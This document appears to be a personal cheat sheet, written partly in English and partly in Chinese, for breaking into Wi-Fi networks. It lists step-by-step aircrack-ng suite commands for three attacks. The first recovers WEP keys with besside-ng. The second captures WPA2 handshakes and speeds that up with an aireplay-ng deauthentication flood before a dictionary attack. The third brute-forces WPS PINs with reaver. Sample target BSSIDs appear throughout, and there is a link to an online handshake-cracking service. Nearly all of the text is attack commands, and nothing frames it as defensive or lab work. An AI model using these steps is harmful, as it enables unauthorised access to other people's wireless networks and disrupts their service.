0.Prepare
0.1 Installing Aircrack-ng
sudo apt-get update
sudo apt-get upgrade
sudo apt-get install aircrack-ng
0.2. To find the name of your wireless network adapter
ip a
ifconfig
0.3. put your attack card into monitor mode
sudo airmon-ng check kill
sudo airmon-ng start wlan0
1. Locate Nearby WEP Networks
sudo airodump-ng wlan0mon --encrypt WEP
2. Attack a Discovered WEP Wi-Fi Network
Besside-ng will log all of the data it collects in a .cap file
So, if your network card was wlan0mon, the BSSID of your target network was 7C:CA:ED:A4:9B:EE, and the target network was on channel 3, your command would look like the following.
besside-ng -b BSSIDofTargetNetwork -c ChannelTargetIsOn NameOfInterfaceCard
besside-ng -b 7C:CA:ED:A4:9B:EE -c 11 wlan0mon
3. Flood the Network & Extract the WEP Key
aircrack-ng ./wep.cap
Ref
https://null-byte.wonderhowto.com/how-to/hack-wi-fi-hunting-down-cracking-wep-networks-0183712/
https://howtotechglitz.com/japan/%E6%96%B0%E3%81%97%E3%81%84pmkid%E3%83%8F%E3%83%83%E3%82%B7%E3%83%A5%E3%82%AD%E3%83%A3%E3%83%83%E3%83%81%E6%94%BB%E6%92%83%E3%81%A7wpa2%E3%83%91%E3%82%B9%E3%83%AF%E3%83%BC%E3%83%89%E3%82%92%E7%A0%B4/
1,抓取握手包
airmon-ng start wlan0(監聽網卡)
airmon-ng check kill(清除其他有影响的環境)
airodump-ng mon0 (掃描附近wifi)
airodump-ng --bssid 目標mac -c (目標ch) -w crack(自定义文件名) mon0
接下来就等待hand包
2,加速(泛洪攻击)
aireplay-ng --deaut 10(10次) -a 目標mac -c 本機mac mon0 (泛洪攻擊)
3,跑字典
aircrack-ng -w /tmp/WPADict.txt crack-01.cap (跑字典,这里的.cap文件是抓到的握手包,前面的是字典)
或者丢到网上在线跑包 http://www.china-paobao.com/
WPS
1.找到开启WPS功能的无线路由器
wash -i wlan0mon -C
如果什么也没有表示周围没有开启WPS的无线路由器。记住要破解wifi的BSSID。
2、开始破解密码
reaver -i wlan0mon -b C8:3A:35:30:3E:C8 -vv -a
1
等待2-10小时:
最后,不要忘了结束无线网卡的监控模式:
airmon-ng stop wlan0mon